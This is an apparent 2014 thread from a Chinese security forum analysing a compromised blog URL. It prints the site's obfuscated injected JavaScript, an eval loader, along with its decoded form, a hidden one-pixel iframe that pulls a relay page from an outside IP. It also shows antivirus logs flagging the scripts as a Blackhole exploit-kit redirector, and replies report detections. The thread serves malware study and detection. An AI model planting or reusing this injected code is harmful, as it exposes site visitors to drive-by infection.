收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://virginiaeyecarecenter.blogspot.no/
返回列表 发新帖
查看: 3347|回复: 4
收起左侧

[已鉴定] http://virginiaeyecarecenter.blogspot.no/

[复制链接]
fireold
发表于 2014-2-8 17:18:54 | 显示全部楼层 |阅读模式
  1. /*0242d5*/
  2.     p = parseInt;
  3.     ss = (123) ? String.fromCharCode : 0;
  4.     asgq = "28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!74!70!78!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!74!70!78!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!35!30!2e!36!32!2e!31!32!3@!2e!31!35!35!2f!6@!6d!67!2f!72!65!6c!61!7@!2e!70!68!70!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!74!70!78!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!68!74!70!78!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!68!74!70!78!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!68!74!70!78!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!68!74!70!78!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b".replace(/@/g, "9").split("!");
  5.     try {
  6.         document.body &= 0.1
  7.     } catch (gdsgsdg) {
  8.         zz = 3;
  9.         dbshre = 71;
  10.         if (dbshre) {
  11.             vfvwe = 0;
  12.             try {
  13.                 document;
  14.             } catch (agdsg) {
  15.                 vfvwe = 1;
  16.             }
  17.             if (!vfvwe) {
  18.                 e = eval;
  19.             }
  20.             s = "";
  21.             if (zz) for (i = 0; i - 484 != 0; i++) {
  22.                 if (window.document) s += ss(p(asgq[i], 16));
  23.             }
  24.             if (window.document) e(s);
  25.         }
  26.     } /*/0242d5*/
复制代码

  1. (function() {
  2.     var htpx = document.createElement('iframe');

  4.     htpx.src = 'http://50.62.129.155/img/relay.php';
  5.     htpx.style.position = 'absolute';
  6.     htpx.style.border = '0';
  7.     htpx.style.height = '1px';
  8.     htpx.style.width = '1px';
  9.     htpx.style.left = '1px';
  10.     htpx.style.top = '1px';

  12.     if (!document.getElementById('htpx')) {
  13.         document.write('<div id=\'htpx\'></div>');
  14.         document.getElementById('htpx').appendChild(htpx);
  15.     }
  16. })();
复制代码


Avira
2014/2/8 下午 05:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\c_addon_fx_fade[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.2 [virus]'
      執行的動作:傳輸至掃描程式

2014/2/8 下午 05:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\commonscripts[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.2 [virus]'
      執行的動作:傳輸至掃描程式

2014/2/8 下午 05:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\customer_c_config[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.2 [virus]'
      執行的動作:拒絕存取

2014/2/8 下午 05:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\commonscripts[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.2 [virus]'
      執行的動作:拒絕存取

2014/2/8 下午 05:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\c_addon_fx_shadow[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.2 [virus]'
      執行的動作:拒絕存取

2014/2/8 下午 05:12 [Web Protection] 發現惡意程式碼
      從 URL "http://eyesocialeyes.com/banner/Scripts/commonscripts.js" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.CZ.2' [virus]。
      已採取動作:已略過

2014/2/8 下午 05:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\c_addon_fx_fade[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.2 [virus]'
      執行的動作:拒絕存取

2014/2/8 下午 05:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\googlescripts_premierVS[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.2 [virus]'
      執行的動作:傳輸至掃描程式

2014/2/8 下午 05:12 [Web Protection] 發現惡意程式碼
      從 URL "http://eyesocialeyes.com/banner/Scripts/c_addon_fx_fade.js" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.CZ.2' [virus]。
      已採取動作:已略過

2014/2/8 下午 05:12 [Web Protection] 發現惡意程式碼
      從 URL "http://eyesocialeyes.com/banner/Scripts/c_smartmenus.js" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.CZ.2' [virus]。
      已採取動作:封鎖的檔案

2014/2/8 下午 05:12 [Web Protection] 發現惡意程式碼
      從 URL "http://eyesocialeyes.com/banner/Scripts/slideshow.js" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.CZ.2' [virus]。
      已採取動作:封鎖的檔案

2014/2/8 下午 05:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\c_addon_fx_shadow[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.2 [virus]'
      執行的動作:傳輸至掃描程式

2014/2/8 下午 05:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\googlescripts_premierVS[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.2 [virus]'
      執行的動作:拒絕存取

2014/2/8 下午 05:12 [Web Protection] 發現惡意程式碼
      從 URL "http://eyesocialeyes.com/banner/Scripts/googlescripts_premierVS.js"
      存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.CZ.2' [virus]。
      已採取動作:已略過

2014/2/8 下午 05:12 [Web Protection] 發現惡意程式碼
      從 URL "http://eyesocialeyes.com/banner/Scripts/c_addon_fx_shadow.js" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.CZ.2' [virus]。
      已採取動作:已略過

2014/2/8 下午 05:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\customer_c_config[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.2 [virus]'
      執行的動作:傳輸至掃描程式

2014/2/8 下午 05:12 [Web Protection] 發現惡意程式碼
      從 URL "http://eyesocialeyes.com/banner/Scripts/customer_c_config.js" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.CZ.2' [virus]。
      已採取動作:已略過


av4.jpg



fs is
fs4.jpg
回复

举报

z2009
发表于 2014-2-8 20:21:10 | 显示全部楼层
当当当,已经检测到危害
回复

举报

z紫f风l铃
发表于 2014-4-27 10:54:52 | 显示全部楼层
ESET拦截13个
QQ图片20140427105415.jpg
回复

举报

z紫f风l铃
发表于 2014-5-2 19:13:23 | 显示全部楼层
诺顿拦截
QQ图片20140502191302.jpg
回复

举报

trisfree
发表于 2014-5-2 21:20:53 | 显示全部楼层
好家伙 蜘蛛20+

QQ截图20140502212004.png
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 19:42 , Processed in 0.126578 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表